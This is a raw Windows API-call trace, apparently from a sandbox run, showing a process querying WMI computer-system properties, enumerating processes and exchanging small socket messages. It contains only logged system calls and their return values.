	[0200.962] WbemDefPath:IWbemPath:GetText (in: This=0x1cd15ba0, lFlags=4, puBuffLength=0x1c6eceb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c6eceb0*=0x17, pszText=0x0) returned 0x0
	[0200.962] WbemDefPath:IWbemPath:GetText (in: This=0x1cd15ba0, lFlags=4, puBuffLength=0x1c6eceb0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6eceb0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0200.962] IWbemClassObject:GetNames (in: This=0x1cd1de20, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x1c6ecea8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x1c6ecea0 | out: pNames=0x1c6ecea0*="\x01ƀ\x08") returned 0x0
	[0200.962] SafeArrayGetDim (psa=0x1b832ee0) returned 0x1
	[0200.963] IWbemClassObject:Get (in: This=0x1cd1de20, wszName="__GENUS", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c6ece9c*=3, plFlavor=0x1c6ece98*=64) returned 0x0
	[0200.963] IWbemClassObject:Get (in: This=0x1cd1de20, wszName="__CLASS", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0200.963] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0200.963] IWbemClassObject:Get (in: This=0x1cd1de20, wszName="__SUPERCLASS", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0200.963] IWbemClassObject:Get (in: This=0x1cd1de20, wszName="__DYNASTY", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0200.963] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0200.964] IWbemClassObject:Get (in: This=0x1cd1de20, wszName="__RELPATH", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0200.964] SysStringLen (param_1="Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x25
	[0200.964] IWbemClassObject:Get (in: This=0x1cd1de20, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a, varVal2=0x0), pType=0x1c6ece9c*=3, plFlavor=0x1c6ece98*=64) returned 0x0
	[0200.964] IWbemClassObject:Get (in: This=0x1cd1de20, wszName="__DERIVATION", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1b832ee0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x1b84ab80, rgsabound=((cElements=0x0, lLbound=0))), varVal2=0x0), pType=0x1c6ece9c*=8200, plFlavor=0x1c6ece98*=64) returned 0x0
	[0200.964] IWbemClassObject:Get (in: This=0x1cd1de20, wszName="__SERVER", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0200.964] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0200.964] IWbemClassObject:Get (in: This=0x1cd1de20, wszName="__NAMESPACE", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0200.964] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0200.965] IWbemClassObject:Get (in: This=0x1cd1de20, wszName="__PATH", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0200.965] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
	[0200.965] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd15ba0, puCount=0x1c6ecf40 | out: puCount=0x1c6ecf40*=0x2) returned 0x0
	[0200.965] WbemDefPath:IWbemPath:GetText (in: This=0x1cd15ba0, lFlags=4, puBuffLength=0x1c6ecf40*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecf40*=0x17, pszText=0x0) returned 0x0
	[0200.965] WbemDefPath:IWbemPath:GetText (in: This=0x1cd15ba0, lFlags=4, puBuffLength=0x1c6ecf40*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecf40*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0200.965] IWbemClassObject:Get (in: This=0x1cd1de20, wszName="Manufacturer", lFlags=0, pVal=0x1c6ecf30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecf2c*=0, plFlavor=0x1c6ecf28*=0 | out: pVal=0x1c6ecf30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CLEVO", varVal2=0x0), pType=0x1c6ecf2c*=8, plFlavor=0x1c6ecf28*=32) returned 0x0
	[0200.965] SysStringLen (param_1="CLEVO") returned 0x5
	[0200.965] IWbemClassObject:Get (in: This=0x1cd1de20, wszName="Manufacturer", lFlags=0, pVal=0x1c6ed160*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ed15c*=8, plFlavor=0x1c6ed158*=32 | out: pVal=0x1c6ed160*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CLEVO", varVal2=0x0), pType=0x1c6ed15c*=8, plFlavor=0x1c6ed158*=32) returned 0x0
	[0200.965] SysStringLen (param_1="CLEVO") returned 0x5
	[0200.966] send (s=0x414, buf=0x30f93f8*, len=32, flags=0) returned 32
	[0200.967] recv (in: s=0x414, buf=0x3065f58, len=502, flags=0 | out: buf=0x3065f58*) returned 90
	[0201.104] VirtualQuery (in: lpAddress=0x1c6eca60, lpBuffer=0x1c6ed920, dwLength=0x30 | out: lpBuffer=0x1c6ed920*(BaseAddress=0x1c6ec000, AllocationBase=0x1bd60000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0202.118] send (s=0x414, buf=0x3121ff8*, len=27, flags=0) returned 27
	[0202.119] recv (in: s=0x414, buf=0x3065f58, len=502, flags=0 | out: buf=0x3065f58*) returned 122
	[0202.126] VirtualQuery (in: lpAddress=0x1c6eca60, lpBuffer=0x1c6ed920, dwLength=0x30 | out: lpBuffer=0x1c6ed920*(BaseAddress=0x1c6ec000, AllocationBase=0x1bd60000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0202.568] CoTaskMemAlloc (cb=0x104) returned 0x1b84b330
	[0202.568] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b84b330, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0202.569] CoTaskMemFree (pv=0x1b84b330) 
	[0203.824] EnumProcesses (in: lpidProcess=0x3151108, cb=0x400, lpcbNeeded=0x1c6eccb0 | out: lpidProcess=0x3151108, lpcbNeeded=0x1c6eccb0) returned 1
	[0203.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d110e8, Length=0x20000, ResultLength=0x1c6ecbd0 | out: SystemInformation=0x12d110e8, ResultLength=0x1c6ecbd0*=0x140e0) returned 0x0
	[0210.570] send (s=0x414, buf=0x31e43d0*, len=24, flags=0) returned 24
	[0210.571] recv (in: s=0x414, buf=0x3065f58, len=502, flags=0 | out: buf=0x3065f58*) returned 375
	[0210.578] VirtualQuery (in: lpAddress=0x1c6eca60, lpBuffer=0x1c6ed920, dwLength=0x30 | out: lpBuffer=0x1c6ed920*(BaseAddress=0x1c6ec000, AllocationBase=0x1bd60000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0211.117] CoGetObjectContext (in: riid=0x1c6ecd78*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ecd70 | out: ppv=0x1c6ecd70*=0x321868) returned 0x0
	[0211.117] IComThreadingInfo:GetCurrentApartmentType (in: This=0x321868, pAptType=0x1c6ecd90 | out: pAptType=0x1c6ecd90*=1) returned 0x0
	[0211.117] IUnknown:QueryInterface (in: This=0x321868, riid=0x3005488*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c6ece98 | out: ppvObject=0x1c6ece98*=0x0) returned 0x80004002
	[0211.117] IUnknown:Release (This=0x321868) returned 0x1
	[0211.118] CoGetClassObject (in: rclsid=0x1b82a358*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ec400 | out: ppv=0x1c6ec400*=0x1cd11d00) returned 0x0
	[0211.118] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd11d00, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec110 | out: ppvObject=0x1c6ec110*=0x0) returned 0x80004002
	[0211.118] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1cd11d00, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec0f8 | out: ppvObject=0x1c6ec0f8*=0x1cd1dcd0) returned 0x0
	[0211.119] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd1dcd0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec000 | out: ppvObject=0x1c6ec000*=0x1cd1dcd0) returned 0x0
	[0211.119] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd1dcd0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec080 | out: ppvObject=0x1c6ec080*=0x0) returned 0x80004002
	[0211.119] WbemDefPath:IUnknown:AddRef (This=0x1cd1dcd0) returned 0x3
	[0211.119] CoGetContextToken (in: pToken=0x1c6ebcd0 | out: pToken=0x1c6ebcd0) returned 0x0
	[0211.119] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd1dcd0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebc90 | out: ppvObject=0x1c6ebc90*=0x1b852990) returned 0x0
	[0211.120] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b852990, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ebcc0 | out: pCid=0x1c6ebcc0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0211.120] WbemDefPath:IUnknown:Release (This=0x1b852990) returned 0x3
	[0211.120] CoGetContextToken (in: pToken=0x1c6ebca0 | out: pToken=0x1c6ebca0) returned 0x0
	[0211.120] WbemDefPath:IUnknown:AddRef (This=0x1cd1dcd0) returned 0x4
	[0211.120] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd1dcd0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebdb8 | out: ppvObject=0x1c6ebdb8*=0x0) returned 0x80004002
	[0211.120] WbemDefPath:IUnknown:Release (This=0x1cd1dcd0) returned 0x3
	[0211.121] WbemDefPath:IUnknown:Release (This=0x1cd1dcd0) returned 0x2
	[0211.121] WbemDefPath:IUnknown:Release (This=0x1cd11d00) returned 0x0
	[0211.121] WbemDefPath:IUnknown:Release (This=0x1cd1dcd0) returned 0x1
	[0211.121] CoGetContextToken (in: pToken=0x1c6ec9d0 | out: pToken=0x1c6ec9d0) returned 0x0
	[0211.121] CoGetContextToken (in: pToken=0x1c6ec910 | out: pToken=0x1c6ec910) returned 0x0
	[0211.121] WbemDefPath:IUnknown:AddRef (This=0x1cd1dcd0) returned 0x2
	[0211.121] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd1dcd0, riid=0x1c6eca50*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c6eca30 | out: ppvObject=0x1c6eca30*=0x1cd1dcd0) returned 0x0
	[0211.121] WbemDefPath:IUnknown:Release (This=0x1cd1dcd0) returned 0x2
	[0211.122] WbemDefPath:IUnknown:Release (This=0x1cd1dcd0) returned 0x1
	[0211.122] CoGetContextToken (in: pToken=0x1c6ecb50 | out: pToken=0x1c6ecb50) returned 0x0
	[0211.122] CoGetContextToken (in: pToken=0x1c6eca90 | out: pToken=0x1c6eca90) returned 0x0
	[0211.122] WbemDefPath:IUnknown:AddRef (This=0x1cd1dcd0) returned 0x2
	[0211.122] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd1dcd0, riid=0x1c6ecbd0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c6ecbb0 | out: ppvObject=0x1c6ecbb0*=0x1cd1dcd0) returned 0x0
	[0211.122] WbemDefPath:IUnknown:Release (This=0x1cd1dcd0) returned 0x2
	[0211.122] WbemDefPath:IUnknown:AddRef (This=0x1cd1dcd0) returned 0x3
	[0211.122] WbemDefPath:IWbemPath:SetText (This=0x1cd1dcd0, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0211.122] WbemDefPath:IUnknown:Release (This=0x1cd1dcd0) returned 0x2
	[0211.123] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd1dcd0, puCount=0x1c6ece60 | out: puCount=0x1c6ece60*=0x2) returned 0x0
	[0211.123] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1dcd0, lFlags=4, puBuffLength=0x1c6ece60*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ece60*=0x17, pszText=0x0) returned 0x0
	[0211.123] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1dcd0, lFlags=4, puBuffLength=0x1c6ece60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ece60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0211.123] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd1dcd0, puCount=0x1c6ece10 | out: puCount=0x1c6ece10*=0x2) returned 0x0
	[0211.123] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1dcd0, lFlags=4, puBuffLength=0x1c6ece10*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ece10*=0x17, pszText=0x0) returned 0x0
	[0211.123] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1dcd0, lFlags=4, puBuffLength=0x1c6ece10*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ece10*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0211.123] CoGetObjectContext (in: riid=0x1c6ecd48*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ecd40 | out: ppv=0x1c6ecd40*=0x321868) returned 0x0
	[0211.123] IComThreadingInfo:GetCurrentApartmentType (in: This=0x321868, pAptType=0x1c6ecd60 | out: pAptType=0x1c6ecd60*=1) returned 0x0
	[0211.123] IUnknown:QueryInterface (in: This=0x321868, riid=0x3005488*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c6ece68 | out: ppvObject=0x1c6ece68*=0x0) returned 0x80004002
	[0211.123] IUnknown:Release (This=0x321868) returned 0x1
	[0211.124] CoGetClassObject (in: rclsid=0x1b82a6d8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ec9f0 | out: ppv=0x1c6ec9f0*=0x1cd11da0) returned 0x0
	[0211.124] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd11da0, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec700 | out: ppvObject=0x1c6ec700*=0x0) returned 0x80004002
	[0211.124] WbemLocator:IClassFactory:CreateInstance (in: This=0x1cd11da0, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec6e8 | out: ppvObject=0x1c6ec6e8*=0x1cd11dc0) returned 0x0
	[0211.124] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd11dc0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec5f0 | out: ppvObject=0x1c6ec5f0*=0x1cd11dc0) returned 0x0
	[0211.124] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd11dc0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec670 | out: ppvObject=0x1c6ec670*=0x0) returned 0x80004002
	[0211.125] WbemLocator:IUnknown:AddRef (This=0x1cd11dc0) returned 0x3
	[0211.125] CoGetContextToken (in: pToken=0x1c6ec2c0 | out: pToken=0x1c6ec2c0) returned 0x0
	[0211.125] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd11dc0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec280 | out: ppvObject=0x1c6ec280*=0x0) returned 0x80004002
	[0211.125] CoGetContextToken (in: pToken=0x1c6ec290 | out: pToken=0x1c6ec290) returned 0x0
	[0211.125] WbemLocator:IUnknown:AddRef (This=0x1cd11dc0) returned 0x4
	[0211.126] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd11dc0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec3a8 | out: ppvObject=0x1c6ec3a8*=0x0) returned 0x80004002
	[0211.126] WbemLocator:IUnknown:Release (This=0x1cd11dc0) returned 0x3
	[0211.126] WbemLocator:IUnknown:Release (This=0x1cd11dc0) returned 0x2
	[0211.126] WbemLocator:IUnknown:Release (This=0x1cd11da0) returned 0x0
	[0211.126] WbemLocator:IUnknown:Release (This=0x1cd11dc0) returned 0x1
	[0211.126] CoGetContextToken (in: pToken=0x1c6ec8b0 | out: pToken=0x1c6ec8b0) returned 0x0
	[0211.126] CoGetContextToken (in: pToken=0x1c6ec7f0 | out: pToken=0x1c6ec7f0) returned 0x0
	[0211.126] WbemLocator:IUnknown:AddRef (This=0x1cd11dc0) returned 0x2
	[0211.127] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd11dc0, riid=0x1c6ec930*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c6ec910 | out: ppvObject=0x1c6ec910*=0x1cd11dc0) returned 0x0
	[0211.127] WbemLocator:IUnknown:Release (This=0x1cd11dc0) returned 0x2
	[0211.127] WbemLocator:IUnknown:Release (This=0x1cd11dc0) returned 0x1
	[0211.127] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd1dcd0, puCount=0x1c6ecd10 | out: puCount=0x1c6ecd10*=0x2) returned 0x0
	[0211.127] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1dcd0, lFlags=8, puBuffLength=0x1c6ecd10*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecd10*=0x17, pszText=0x0) returned 0x0
	[0211.127] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1dcd0, lFlags=8, puBuffLength=0x1c6ecd10*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecd10*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0211.127] CoCreateInstance (in: rclsid=0x642ffff15a8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x642ffff14d8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1c6eca00 | out: ppv=0x1c6eca00*=0x1cd11de0) returned 0x0
	[0211.127] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1cd11de0, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x1c6ecc90 | out: ppNamespace=0x1c6ecc90*=0x1cd1aec8) returned 0x0
	[0211.836] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd1aec8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec878 | out: ppvObject=0x1c6ec878*=0x1b83c740) returned 0x0
	[0211.836] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x1b83c740, pProxy=0x1cd1aec8, pAuthnSvc=0x1c6ec870, pAuthzSvc=0x1c6ec86c, pServerPrincName=0x1c6ec898, pAuthnLevel=0x1c6ec868, pImpLevel=0x1c6ec884, pAuthInfo=0x1c6ec8a8, pCapabilites=0x1c6ec880 | out: pAuthnSvc=0x1c6ec870*=0xa, pAuthzSvc=0x1c6ec86c*=0x0, pServerPrincName=0x1c6ec898, pAuthnLevel=0x1c6ec868*=0x6, pImpLevel=0x1c6ec884*=0x2, pAuthInfo=0x1c6ec8a8, pCapabilites=0x1c6ec880*=0x1) returned 0x0
	[0211.836] WbemLocator:IUnknown:Release (This=0x1b83c740) returned 0x1
	[0211.836] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd1aec8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec818 | out: ppvObject=0x1c6ec818*=0x1b83c780) returned 0x0
	[0211.836] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd1aec8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec7a8 | out: ppvObject=0x1c6ec7a8*=0x1b83c740) returned 0x0
